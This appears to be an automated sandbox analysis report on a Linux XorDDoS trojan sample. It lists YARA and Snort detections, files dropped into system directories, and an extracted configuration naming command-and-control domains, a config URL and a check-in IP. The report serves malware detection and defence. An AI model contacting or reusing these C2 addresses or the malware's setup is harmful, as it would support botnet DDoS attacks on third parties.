Process Memory Space: TmoTjBkSXT.elf PID: 6299	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: TmoTjBkSXT.elf PID: 6299	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x1d2c:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x1e09:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: TmoTjBkSXT.elf PID: 6325	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: TmoTjBkSXT.elf PID: 6325	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0xe67:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xf44:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: TmoTjBkSXT.elf PID: 6328	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: TmoTjBkSXT.elf PID: 6328	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x1a0d:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x1aea:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: TmoTjBkSXT.elf PID: 6330	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: TmoTjBkSXT.elf PID: 6330	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x1d2c:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x1e09:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: TmoTjBkSXT.elf PID: 6333	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: TmoTjBkSXT.elf PID: 6333	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0xce5:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xdc2:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: TmoTjBkSXT.elf PID: 6336	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: TmoTjBkSXT.elf PID: 6336	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x1d93:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x1e70:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: TmoTjBkSXT.elf PID: 6342	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: TmoTjBkSXT.elf PID: 6342	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x21cd:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x22aa:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: TmoTjBkSXT.elf PID: 6345	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: TmoTjBkSXT.elf PID: 6345	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x9c6:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xaa3:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: TmoTjBkSXT.elf PID: 6348	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: TmoTjBkSXT.elf PID: 6348	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x8a5:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x982:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: TmoTjBkSXT.elf PID: 6350	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: TmoTjBkSXT.elf PID: 6350	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0xd4b:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xe28:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: TmoTjBkSXT.elf PID: 6353	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: TmoTjBkSXT.elf PID: 6353	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0xbc4:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xca1:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: TmoTjBkSXT.elf PID: 6359	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: TmoTjBkSXT.elf PID: 6359	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x8a5:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x982:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: TmoTjBkSXT.elf PID: 6364	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: TmoTjBkSXT.elf PID: 6364	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x1eae:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x1f8b:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: TmoTjBkSXT.elf PID: 6366	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: TmoTjBkSXT.elf PID: 6366	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x18ec:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x19c9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: TmoTjBkSXT.elf PID: 6369	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: TmoTjBkSXT.elf PID: 6369	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0xbc4:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xca1:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: TmoTjBkSXT.elf PID: 6372	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: TmoTjBkSXT.elf PID: 6372	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x1065:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x1142:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: TmoTjBkSXT.elf PID: 6378	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: TmoTjBkSXT.elf PID: 6378	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x18ec:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x19c9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: TmoTjBkSXT.elf PID: 6381	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: TmoTjBkSXT.elf PID: 6381	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x20ac:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x2189:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: TmoTjBkSXT.elf PID: 6383	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: TmoTjBkSXT.elf PID: 6383	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x21cd:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x22aa:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: TmoTjBkSXT.elf PID: 6386	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: TmoTjBkSXT.elf PID: 6386	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x18ec:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x19c9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: TmoTjBkSXT.elf PID: 6389	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: TmoTjBkSXT.elf PID: 6389	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x21cd:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x22aa:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: TmoTjBkSXT.elf PID: 6395	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: TmoTjBkSXT.elf PID: 6395	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x18ec:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x19c9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: TmoTjBkSXT.elf PID: 6398	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: TmoTjBkSXT.elf PID: 6398	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x18ec:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x19c9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: TmoTjBkSXT.elf PID: 6401	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: TmoTjBkSXT.elf PID: 6401	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0xe67:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xf44:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: TmoTjBkSXT.elf PID: 6403	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: TmoTjBkSXT.elf PID: 6403	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x8a5:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x982:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: TmoTjBkSXT.elf PID: 6406	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: TmoTjBkSXT.elf PID: 6406	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x8a5:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x982:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: TmoTjBkSXT.elf PID: 6412	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: TmoTjBkSXT.elf PID: 6412	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x1d2c:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x1e09:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: TmoTjBkSXT.elf PID: 6415	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: TmoTjBkSXT.elf PID: 6415	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x8a5:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x982:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: TmoTjBkSXT.elf PID: 6418	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: TmoTjBkSXT.elf PID: 6418	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0xce5:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xdc2:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: TmoTjBkSXT.elf PID: 6420	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: TmoTjBkSXT.elf PID: 6420	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x118c:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x1269:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: TmoTjBkSXT.elf PID: 6422	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: TmoTjBkSXT.elf PID: 6422	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x1eb4:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x1f91:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: TmoTjBkSXT.elf PID: 6432	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: TmoTjBkSXT.elf PID: 6432	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x1a0d:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x1aea:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: TmoTjBkSXT.elf PID: 6435	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: TmoTjBkSXT.elf PID: 6435	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x1c0b:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x1ce8:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: TmoTjBkSXT.elf PID: 6437	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: TmoTjBkSXT.elf PID: 6437	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0xbc4:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xca1:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: TmoTjBkSXT.elf PID: 6440	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: TmoTjBkSXT.elf PID: 6440	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x8a5:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x982:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: TmoTjBkSXT.elf PID: 6443	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: TmoTjBkSXT.elf PID: 6443	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x18ec:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x19c9:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: TmoTjBkSXT.elf PID: 6449	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: TmoTjBkSXT.elf PID: 6449	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x1a0d:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x1aea:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: TmoTjBkSXT.elf PID: 6452	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: TmoTjBkSXT.elf PID: 6452	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x1c0b:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x1ce8:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: TmoTjBkSXT.elf PID: 6455	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: TmoTjBkSXT.elf PID: 6455	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x1186:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x1263:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: TmoTjBkSXT.elf PID: 6457	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: TmoTjBkSXT.elf PID: 6457	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x1186:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x1263:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: TmoTjBkSXT.elf PID: 6459	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: TmoTjBkSXT.elf PID: 6459	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0xd46:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xe23:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: TmoTjBkSXT.elf PID: 6466	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: TmoTjBkSXT.elf PID: 6466	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x1d9d:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x1e7a:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: TmoTjBkSXT.elf PID: 6469	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: TmoTjBkSXT.elf PID: 6469	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x1eba:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x1f97:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: TmoTjBkSXT.elf PID: 6471	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: TmoTjBkSXT.elf PID: 6471	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x9c6:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xaa3:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: TmoTjBkSXT.elf PID: 6474	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: TmoTjBkSXT.elf PID: 6474	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x1eae:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x1f8b:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: TmoTjBkSXT.elf PID: 6477	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: TmoTjBkSXT.elf PID: 6477	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0xd4f:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xe2c:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: TmoTjBkSXT.elf PID: 6483	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: TmoTjBkSXT.elf PID: 6483	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x1a0d:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x1aea:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: TmoTjBkSXT.elf PID: 6486	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: TmoTjBkSXT.elf PID: 6486	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x21cd:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x22aa:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: TmoTjBkSXT.elf PID: 6488	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: TmoTjBkSXT.elf PID: 6488	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x1eb4:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x1f91:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: TmoTjBkSXT.elf PID: 6491	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: TmoTjBkSXT.elf PID: 6491	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x1186:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x1263:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: TmoTjBkSXT.elf PID: 6493	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: TmoTjBkSXT.elf PID: 6493	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x21d4:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x22b1:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: TmoTjBkSXT.elf PID: 6500	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: TmoTjBkSXT.elf PID: 6500	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x9c6:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xaa3:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Click to see the 744 entries

Snort Signatures

ET TROJAN DDoS.XOR Checkin - Source IP: 192.168.2.23 - Destination IP: 137.175.88.241

Timestamp:	03/30/24-00:00:50.931941
SID:	2020381
Source Port:	57452
Destination Port:	1430
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: TmoTjBkSXT.elf

Avira: detected

Antivirus detection for dropped file

Source: /usr/lib/libudev.so	Avira: detection malicious, Label: LINUX/Xorddos.cona
Source: /usr/bin/xilfqxoepi	Avira: detection malicious, Label: LINUX/Xorddos.cona
Source: /usr/bin/flfoijfhrh	Avira: detection malicious, Label: LINUX/Xorddos.cona
Source: /usr/bin/zygafieftp	Avira: detection malicious, Label: LINUX/Xorddos.cona
Source: /usr/bin/rfjhcudkoa	Avira: detection malicious, Label: LINUX/Xorddos.cona
Source: /usr/bin/wrvgghkqdd	Avira: detection malicious, Label: LINUX/Xorddos.cona
Source: /usr/bin/vwtoogupfm	Avira: detection malicious, Label: LINUX/Xorddos.cona
Source: /usr/bin/eygutfitxp	Avira: detection malicious, Label: LINUX/Xorddos.cona
Source: /usr/bin/ljhaidbadz	Avira: detection malicious, Label: LINUX/Xorddos.cona
Source: /usr/bin/ogbruyreel	Avira: detection malicious, Label: LINUX/Xorddos.cona
Source: /usr/bin/ybavzvdbws	Avira: detection malicious, Label: LINUX/Xorddos.cona
Source: /usr/bin/ucawyxmhdv	Avira: detection malicious, Label: LINUX/Xorddos.cona
Source: /usr/bin/mqnheeruxi	Avira: detection malicious, Label: LINUX/Xorddos.cona
Source: /usr/bin/zuuufkngmy	Avira: detection malicious, Label: LINUX/Xorddos.cona
Source: /usr/bin/pmvkvnihjm	Avira: detection malicious, Label: LINUX/Xorddos.cona

Found malware configuration

Source: TmoTjBkSXT.elf

Malware Configuration Extractor: XorDDoS {"C2 list": ["http://ww.wowapplecar.com/config.rar\u000030", "dd.vvbb321.com:1430", "dd.jjkk567.com:1430", "dd.nnmm234.com:1430"]}

Multi AV Scanner detection for submitted file

Source: TmoTjBkSXT.elf	ReversingLabs: Detection: 65%
Source: TmoTjBkSXT.elf	Virustotal: Detection: 42%			Perma Link

Machine Learning detection for dropped file

Source: /usr/lib/libudev.so	Joe Sandbox ML: detected
Source: /usr/bin/xilfqxoepi	Joe Sandbox ML: detected
Source: /usr/bin/flfoijfhrh	Joe Sandbox ML: detected
Source: /usr/bin/zygafieftp	Joe Sandbox ML: detected
Source: /usr/bin/rfjhcudkoa	Joe Sandbox ML: detected
Source: /usr/bin/wrvgghkqdd	Joe Sandbox ML: detected
Source: /usr/bin/vwtoogupfm	Joe Sandbox ML: detected
Source: /usr/bin/eygutfitxp	Joe Sandbox ML: detected
Source: /usr/bin/ljhaidbadz	Joe Sandbox ML: detected
Source: /usr/bin/ogbruyreel	Joe Sandbox ML: detected
Source: /usr/bin/ybavzvdbws	Joe Sandbox ML: detected
Source: /usr/bin/ucawyxmhdv	Joe Sandbox ML: detected
Source: /usr/bin/mqnheeruxi	Joe Sandbox ML: detected
Source: /usr/bin/piqqogcjxo	Joe Sandbox ML: detected
Source: /usr/bin/zuuufkngmy	Joe Sandbox ML: detected
Source: /usr/bin/pmvkvnihjm	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: TmoTjBkSXT.elf

Joe Sandbox ML: detected

Source: /tmp/TmoTjBkSXT.elf (PID: 6221)

Reads CPU info from proc file: /proc/cpuinfo

Jump to behavior

Networking

Snort IDS alert for network traffic

Source: Traffic

Snort IDS: 2020381 ET TROJAN DDoS.XOR Checkin 192.168.2.23:57452 -> 137.175.88.241:1430

Source: global traffic

TCP traffic: 192.168.2.23:57452 -> 137.175.88.241:1430

Source: global traffic	TCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
Source: global traffic	TCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
Source: global traffic	TCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80

Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown	TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown	TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.42

Source: unknown

DNS traffic detected: queries for: ww.wowapplecar.com

Source: TmoTjBkSXT.elf, 6220.1.00000000ffa3c000.00000000ffa5d000.rw-.sdmp, TmoTjBkSXT.elf, 6222.1.00000000ffa3c000.00000000ffa5d000.rw-.sdmp, TmoTjBkSXT.elf, 6223.1.00000000ffa3c000.00000000ffa5d000.rw-.sdmp, TmoTjBkSXT.elf, 6224.1.00000000ffa3c000.00000000ffa5d000.rw-.sdmp, TmoTjBkSXT.elf, 6253.1.00000000ffa3c000.00000000ffa5d000.rw-.sdmp, TmoTjBkSXT.elf, 6256.1.00000000ffa3c000.00000000ffa5d000.rw-.sdmp, TmoTjBkSXT.elf, 6258.1.00000000ffa3c000.00000000ffa5d000.rw-.sdmp, TmoTjBkSXT.elf, 6261.1.00000000ffa3c000.00000000ffa5d000.rw-.sdmp, TmoTjBkSXT.elf, 6264.1.00000000ffa3c000.00000000ffa5d000.rw-.sdmp, TmoTjBkSXT.elf, 6271.1.00000000ffa3c000.00000000ffa5d000.rw-.sdmp, TmoTjBkSXT.elf, 6274.1.00000000ffa3c000.00000000ffa5d000.rw-.sdmp, TmoTjBkSXT.elf, 6276.1.00000000ffa3c000.00000000ffa5d000.rw-.sdmp, TmoTjBkSXT.elf, 6279.1.00000000ffa3c000.00000000ffa5d000.rw-.sdmp, TmoTjBkSXT.elf, 6281.1.00000000ffa3c000.00000000ffa5d000.rw-.sdmp, TmoTjBkSXT.elf, 6288.1.00000000ffa3c000.00000000ffa5d000.rw-.sdmp, TmoTjBkSXT.elf, 6291.1.00000000ffa3c000.00000000ffa5d000.rw-.sdmp, TmoTjBkSXT.elf, 6293.1.00000000ffa3c000.00000000ffa5d000.rw-.sdmp, TmoTjBkSXT.elf, 6296.1.00000000ffa3c000.00000000ffa5d000.rw-.sdmp, TmoTjBkSXT.elf, 6299.1.00000000ffa3c000.00000000ffa5d000.rw-.sdmp, TmoTjBkSXT.elf, 6325.1.00000000ffa3c000.00000000ffa5d000.rw-.sdmp, TmoTjBkSXT.elf, 6328.1.00000000ffa3c000.00000000ffa5d000.rw-.sdmp	String found in binary or memory: http://ww.wowapplecar.com/config.rar
Source: TmoTjBkSXT.elf, 6220.1.00000000ffa3c000.00000000ffa5d000.rw-.sdmp, TmoTjBkSXT.elf, 6222.1.00000000ffa3c000.00000000ffa5d000.rw-.sdmp, TmoTjBkSXT.elf, 6223.1.00000000ffa3c000.00000000ffa5d000.rw-.sdmp, TmoTjBkSXT.elf, 6224.1.00000000ffa3c000.00000000ffa5d000.rw-.sdmp, TmoTjBkSXT.elf, 6253.1.00000000ffa3c000.00000000ffa5d000.rw-.sdmp, TmoTjBkSXT.elf, 6256.1.00000000ffa3c000.00000000ffa5d000.rw-.sdmp, TmoTjBkSXT.elf, 6258.1.00000000ffa3c000.00000000ffa5d000.rw-.sdmp, TmoTjBkSXT.elf, 6261.1.00000000ffa3c000.00000000ffa5d000.rw-.sdmp, TmoTjBkSXT.elf, 6264.1.00000000ffa3c000.00000000ffa5d000.rw-.sdmp, TmoTjBkSXT.elf, 6271.1.00000000ffa3c000.00000000ffa5d000.rw-.sdmp, TmoTjBkSXT.elf, 6274.1.00000000ffa3c000.00000000ffa5d000.rw-.sdmp, TmoTjBkSXT.elf, 6276.1.00000000ffa3c000.00000000ffa5d000.rw-.sdmp, TmoTjBkSXT.elf, 6279.1.00000000ffa3c000.00000000ffa5d000.rw-.sdmp, TmoTjBkSXT.elf, 6281.1.00000000ffa3c000.00000000ffa5d000.rw-.sdmp, TmoTjBkSXT.elf, 6288.1.00000000ffa3c000.00000000ffa5d000.rw-.sdmp, TmoTjBkSXT.elf, 6291.1.00000000ffa3c000.00000000ffa5d000.rw-.sdmp, TmoTjBkSXT.elf, 6293.1.00000000ffa3c000.00000000ffa5d000.rw-.sdmp, TmoTjBkSXT.elf, 6296.1.00000000ffa3c000.00000000ffa5d000.rw-.sdmp, TmoTjBkSXT.elf, 6299.1.00000000ffa3c000.00000000ffa5d000.rw-.sdmp, TmoTjBkSXT.elf, 6325.1.00000000ffa3c000.00000000ffa5d000.rw-.sdmp, TmoTjBkSXT.elf, 6328.1.00000000ffa3c000.00000000ffa5d000.rw-.sdmp	String found in binary or memory: http://ww.wowapplecar.com/config.rar30
Source: TmoTjBkSXT.elf, libudev.so.13.dr, xilfqxoepi.13.dr, flfoijfhrh.13.dr, zygafieftp.13.dr, rfjhcudkoa.13.dr, wrvgghkqdd.13.dr, vwtoogupfm.13.dr, eygutfitxp.13.dr, ljhaidbadz.13.dr, ogbruyreel.13.dr, ybavzvdbws.13.dr, ucawyxmhdv.13.dr, mqnheeruxi.13.dr, zuuufkngmy.13.dr, pmvkvnihjm.13.dr	String found in binary or memory: http://www.gnu.org/software/libc/bugs.html

Source: unknown	Network traffic detected: HTTP traffic on port 43928 -> 443
